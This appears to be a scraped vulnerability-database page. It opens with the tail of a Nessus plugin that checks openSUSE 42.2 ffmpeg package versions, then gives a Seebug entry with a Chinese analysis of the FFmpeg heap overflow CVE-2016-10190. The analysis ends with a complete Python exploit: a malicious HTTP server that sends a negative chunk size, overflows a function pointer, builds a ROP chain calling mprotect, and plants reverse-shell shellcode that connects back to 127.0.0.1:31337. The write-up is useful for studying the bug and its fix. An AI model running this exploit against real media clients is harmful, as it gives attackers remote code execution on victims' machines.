value:"p-cpe:/a:novell:opensuse:libswresample2-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/28"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.2", reference:"ffmpeg-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"ffmpeg-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"ffmpeg-debugsource-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavcodec-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavcodec57-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavcodec57-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavdevice-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavdevice57-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavdevice57-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavfilter-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavfilter6-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavfilter6-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavformat-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavformat57-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavformat57-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavresample-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavresample3-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavresample3-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavutil-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavutil55-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavutil55-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libpostproc-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libpostproc54-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libpostproc54-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswresample-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswresample2-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswresample2-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswscale-devel-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswscale4-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswscale4-debuginfo-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavcodec57-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavcodec57-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavdevice57-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavdevice57-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavfilter6-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavfilter6-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavformat57-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavformat57-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavresample3-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavresample3-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavutil55-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavutil55-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libpostproc54-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libpostproc54-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswresample2-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswresample2-debuginfo-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswscale4-32bit-3.3-6.6.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswscale4-debuginfo-32bit-3.3-6.6.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ffmpeg / ffmpeg-debuginfo / ffmpeg-debugsource / libavcodec-devel / etc"); }
Seebug
| bulletinFamily | exploit |
| description | 作者:[bird@tsrc](https://security.tencent.com/index.php/blog/msg/116) ## 1. 前言 FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190、CVE-2016-10191以及CVE-2016-10192。本文详细分析了CVE-2016-10190,是二进制安全入门学习堆溢出一个不错的案例。 调试环境: 1. FFmpeg版本:3.2.1按照[https://trac.ffmpeg.org/wiki/CompilationGuide/Ubuntu][1]编译 2. 操作系统:Ubuntu 16.04 x64 ## 2. 漏洞分析 此漏洞是发生在处理`HTTP`流时,读取`HTTP`流的过程大概如下: 1. `avformat_open_input`函数初始化输入文件的主要信息,其中与漏洞有关的是创建`AVIOContext`结构体 2. 如果输入文件是`HTTP`流则调用`http_open`函数发起请求 3. 调用`http_read_header`函数解析响应数据的头信息 4. 解析完后调用`avio_read`->`io_read_packet`->`http_read`->`http_read_stream`函数读取之后的数据 首先看下`http_read_stream`函数 ```c static int http_read_stream(URLContext *h, uint8_t *buf, int size) { HTTPContext *s = h->priv_data; int err, new_location, read_ret; int64_t seek_ret; ... if (s->chunksize >= 0) { if (!s->chunksize) { char line[32]; do { if ((err = http_get_line(s, line, sizeof(line))) < 0) return err; } while (!*line); /* skip CR LF from last chunk */ s->chunksize = strtoll(line, NULL, 16); av_log(NULL, AV_LOG_TRACE, "Chunked encoding data size: %"PRId64"'\n", s->chunksize); if (!s->chunksize) return 0; } size = FFMIN(size, s->chunksize); } ... read_ret = http_buf_read(h, buf, size); ... return read_ret; } ``` 上面`s->chunksize = strtoll(line, NULL, 16)`这一行代码是读取chunk的大小,这里调用`strtoll`函数返回一个有符号数,再看`HTTPContext`结构体 ```c typedef struct HTTPContext { const AVClass *class; URLContext *hd; unsigned char buffer[BUFFER_SIZE], *buf_ptr, *buf_end; int line_count; int http_code; /* Used if "Transfer-Encoding: chunked" otherwise -1. */ int64_t chunksize; ... } HTTPContext; ``` 可以看到`chunksize`为`int64_t`类型也是有符号数,当执行`size = FFMIN(size, s->chunksize)`这行代码时,由于传进来的`size=0x8000`,如果之前的`strtoll`函数返回一个负数,这样就会导致`size = s->chunksize`也为一个负数,之后执行到`read_ret = http_buf_read(h, buf, size)`,看下`http_buf_read`函数 ```c static int http_buf_read(URLContext *h, uint8_t *buf, int size) { HTTPContext *s = h->priv_data; int len; /* read bytes from input buffer first */ len = s->buf_end - s->buf_ptr; if (len > 0) { if (len > size) len = size; memcpy(buf, s->buf_ptr, len); s->buf_ptr += len; } else { int64_t target_end = s->end_off ? s->end_off : s->filesize; if ((!s->willclose || s->chunksize < 0) && target_end >= 0 && s->off >= target_end) return AVERROR_EOF; len = ffurl_read(s->hd, buf, size); ... } ... return len; } ``` 上面代码`else`分支执行到`len = ffurl_read(s->hd, buf, size)`,而`ffurl_read`中又会调用`tcp_read`函数(函数指针的方式)来读取之后真正的数据,最后看`tcp_read`函数 ```c static int tcp_read(URLContext *h, uint8_t *buf, int size) { TCPContext *s = h->priv_data; int ret; if (!(h->flags & AVIO_FLAG_NONBLOCK)) { ret = ff_network_wait_fd_timeout(s->fd, 0, h->rw_timeout, &h->interrupt_callback); if (ret) return ret; } ret = recv(s->fd, buf, size, 0); return ret < 0 ? ff_neterrno() : ret; } ``` 当执行到`ret = recv(s->fd, buf, size, 0)`时,如果`size`为负数,`recv`函数会把`size`转换成无符号数变成一个很大的正数,而`buf`指向的又是堆上的空间,这样就可能导致堆溢出,如果溢出覆盖一个函数指针就可能导致远程代码执行。 ## 3. 漏洞利用 在`http_read_stream`函数里想要执行`s->chunksize = strtoll(line, NULL, 16)`需要`s->chunksize >= 0`,看下发送请求后`http_read_header`函数中解析响应数据里每个请求头的函数`process_line` ```c static int process_line(URLContext *h, char *line, int line_count, int *new_location) { HTTPContext *s = h->priv_data; const char *auto_method = h->flags & AVIO_FLAG_READ ? "POST" : "GET"; char *tag, *p, *end, *method, *resource, *version; int ret; /* end of header */ if (line[0] == '\0') { s->end_header = 1; return 0; } p = line; if (line_count == 0) { ... } else { while (*p != '\0' && *p != ':') p++; if (*p != ':') return 1; *p = '\0'; tag = line; p++; while (av_isspace(*p)) p++; if (!av_strcasecmp(tag, "Location")) { if ((ret = parse_location(s, p)) < 0) return ret; *new_location = 1; } else if (!av_strcasecmp(tag, "Content-Length") && s->filesize == -1) { s->filesize = strtoll(p, NULL, 10); } else if (!av_strcasecmp(tag, "Content-Range")) { parse_content_range(h, p); } else if (!av_strcasecmp(tag, "Accept-Ranges") && !strncmp(p, "bytes", 5) && s->seekable == -1) { h->is_streamed = 0; } else if (!av_strcasecmp(tag, "Transfer-Encoding") && !av_strncasecmp(p, "chunked", 7)) { s->filesize = -1; s->chunksize = 0; } ... } return 1; } ``` 可以看到当请求头中包含`Transfer-Encoding: chunked`时会把`s->filesize`赋值`-1`、`s->chunksize`赋值`0`。 下面看下漏洞利用的整个调试过程,先发送包含`Transfer-Encoding: chunked`的请求头,然后`avio_read`函数中会循环调用`s->read_packet`指向的函数指针`io_read_packet`读取请求头之后的数据 ![image_1b9neb1at1q2b1s5rco61ba11ubf9.png-181.3kB][2] 同时看下`AVIOContext`结构体参数 ![image_1b9nehkdngtu112bjqh5e91hlfm.png-115.2kB][3] 之后来到`http_read_stream`函数 ![image_1b9nf0l4qsd017no1k3t1mur9bf13.png-225.1kB][4] 可以看到`s->chunksize == 0`,这时服务器发送chunk的大小为`-1`,然后就会执行`s->chunksize = strtoll(line, NULL, 16)`把`s->chunksize`赋值为`-1`,并在执行`size = FFMIN(size, s->chunksize)`后把`size`赋值为`-1`,之后来到`http_buf_read`函数 ![image_1b9nfjs3p10ka1tcj1anp1jad9a1g.png-191.3kB][5] 这里`len == 0`会转而执行`else`分支,又由于`s->end_off == 0 && s->filesize == -1`,这样就会执行到`len = ffurl_read(s->hd, buf, size)`,`ffurl_read`中会调用`tcp_read`函数执行到`ret = recv(s->fd, buf, size, 0)` ![image_1b9ngbr781oejf7181vb431bg31t.png-71.9kB][6] 可以看到`buf`的地址是`0x229fd20`,而之前的`AVIOContext`的地址为`0x22a7d80`,因此buf在读入`0x22a7d80 - 0x229fd20 = 0x8060`字节后就可以溢出到`AVIOContext`结构体,这里溢出覆盖它的`read_packet`函数指针 ![image_1b9ngpkhska3slm1d72ouuuh52a.png-208.4kB][7] 这样在`avio_read`函数中循环进行下一次读取的时候就控制了PC ![image_1b9nh0qn511hinqnbnb1rsdmh2n.png-173.5kB][8] 最后利用成功反弹shell的演示 ![2017-03-20_142832.png-2078.3kB][9] ## 4. 完整EXP 根据[https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6][10]修改 ```python #!/usr/bin/python import os import sys import socket from time import sleep from pwn import * bind_ip = '0.0.0.0' bind_port = 12345 headers = """HTTP/1.1 200 OK Server: HTTPd/0.9 Date: Sun, 10 Apr 2005 20:26:47 GMT Content-Type: text/html Transfer-Encoding: chunked """ elf = ELF('/home/bird/ffmpeg_sources/FFmpeg-n3.2.1/ffmpeg') shellcode_location = 0x1b28000 # require writeable -> data or bss segment... page_size = 0x1000 rwx_mode = 7 gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64'))) pop_rdi = gadget('pop rdi; ret') log.info("pop_rdi:%#x" % pop_rdi) pop_rsi = gadget('pop rsi; ret') log.info("pop_rsi:%#x" % pop_rsi) pop_rax = gadget('pop rax; ret') log.info("pop_rax:%#x" % pop_rax) pop_rcx = gadget('pop rcx; ret') log.info("pop_rcx:%#x" % pop_rcx) pop_rdx = gadget('pop rdx; ret') log.info("pop_rdx:%#x" % pop_rdx) pop_rbp = gadget('pop rbp; ret') log.info("pop_rbp:%#x" % pop_rbp) push_rbx = gadget('push rbx; jmp rdi') log.info("push_rbx:%#x" % push_rbx) pop_rsp = gadget('pop rsp; ret') log.info("pop_rsp:%#x" % pop_rsp) add_rsp = gadget('add rsp, 0x58') mov_gadget = gadget('mov qword ptr [rcx], rax ; ret') log.info("mov_gadget:%#x" % mov_gadget) mprotect_func = elf.plt['mprotect'] log.info("mprotect_func:%#x" % mprotect_func) read_func = elf.plt['read'] log.info("read_func:%#x" % read_func) def handle_request(client_socket): request = client_socket.recv(2048) print request payload = '' payload += 'C' * (0x8060) payload += p64(0x004a9929) # rop starts here -> add rsp, 0x58 ; ret payload += 'CCCCCCCC' * 4 payload += p64(0x0040b839) # rdi -> pop rsp ; ret payload += p64(0x015e1df5) # call *%rax -> push rbx ; jmp rdi payload += 'BBBBBBBB' * 3 payload += 'AAAA' payload += p32(0) payload += 'AAAAAAAA' payload += p64(0x004a9929) # second add_esp rop to jump to uncorrupted chunk -> add rsp, 0x58 ; ret payload += 'XXXXXXXX' * 11 # real rop payload starts here # # using mprotect to create executable area payload += p64(pop_rdi) payload += p64(shellcode_location) payload += p64(pop_rsi) payload += p64(page_size) payload += p64(pop_rdx) payload += p64(rwx_mode) payload += p64(mprotect_func) # backconnect shellcode x86_64: 127.0.0.1:31337 shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"; shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode shellslices = map(''.join, zip(*[iter(shellcode)]*8)) write_location = shellcode_location - 8 for shellslice in shellslices: payload += p64(pop_rax) payload += shellslice payload += p64(pop_rcx) payload += p64(write_location) payload += p64(mov_gadget) write_location += 8 payload += p64(pop_rbp) payload += p64(4) payload += p64(shellcode_location) client_socket.send(headers) client_socket.send('-1\n') sleep(5) client_socket.send(payload) client_socket.close() if __name__ == '__main__': s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((bind_ip, bind_port)) s.listen(5) filename = os.path.basename(__file__) st = os.stat(filename) while True: client_socket, addr = s.accept() handle_request(client_socket) if os.stat(filename) != st: print 'restarted' sys.exit(0) ``` ## 5. 总结 此漏洞主要是由于没有正确定义有无符号数的类型导致覆盖函数指针来控制PC,微软在Windows 10中加入了CFG(Control Flow Guard)正是来缓解这种类型的攻击,此漏洞已在[https://github.com/FFmpeg/FFmpeg/commit/2a05c8f813de6f2278827734bf8102291e7484aa][11]中修复。另外对于静态编译的版本,ROP gadget较多,相对好利用,对于动态链接的版本,此漏洞在`libavformat.so`中,找到合适的gadget会有一定难度,但并非没有利用的可能。 # 6. 参考 1. [http://www.openwall.com/lists/oss-security/2017/02/02/1][12] 2. [https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6][13] [1]: https://trac.ffmpeg.org/wiki/CompilationGuide/Ubuntu [2]: http://static.zybuluo.com/birdg0/cw1pcjpcms4qf5qds2w7j7uj/image_1b9neb1at1q2b1s5rco61ba11ubf9.png [3]: http://static.zybuluo.com/birdg0/0g69hl4e3gdq0t9eco1etvkk/image_1b9nehkdngtu112bjqh5e91hlfm.png [4]: http://static.zybuluo.com/birdg0/jmgf9wvj1r1ge5t36xxqcjhu/image_1b9nf0l4qsd017no1k3t1mur9bf13.png [5]: http://static.zybuluo.com/birdg0/r65us1hsde3r9nqa0mil2lzl/image_1b9nfjs3p10ka1tcj1anp1jad9a1g.png [6]: http://static.zybuluo.com/birdg0/w4scn7e6tbeuaxbibt9lwzrr/image_1b9ngbr781oejf7181vb431bg31t.png [7]: http://static.zybuluo.com/birdg0/obwj0j2vg65jj0fned8zvt8n/image_1b9ngpkhska3slm1d72ouuuh52a.png [8]: http://static.zybuluo.com/birdg0/eq4vqkrv49tj1d9z54lrqqyv/image_1b9nh0qn511hinqnbnb1rsdmh2n.png [9]: http://static.zybuluo.com/birdg0/q4z4k7luqi8aebhcjthemlx1/2017-03-20_142832.png [10]: https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6 [11]: https://github.com/FFmpeg/FFmpeg/commit/2a05c8f813de6f2278827734bf8102291e7484aa [12]: http://www.openwall.com/lists/oss-security/2017/02/02/1 [13]: https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6 |
| id | SSV:92798 |
| last seen | 2017-11-19 |
| modified | 2017-03-20 |
| published | 2017-03-20 |
| reporter | Root |
| title | FFmpeg Heap Overflow vulnerability (CVE-2016-10190) |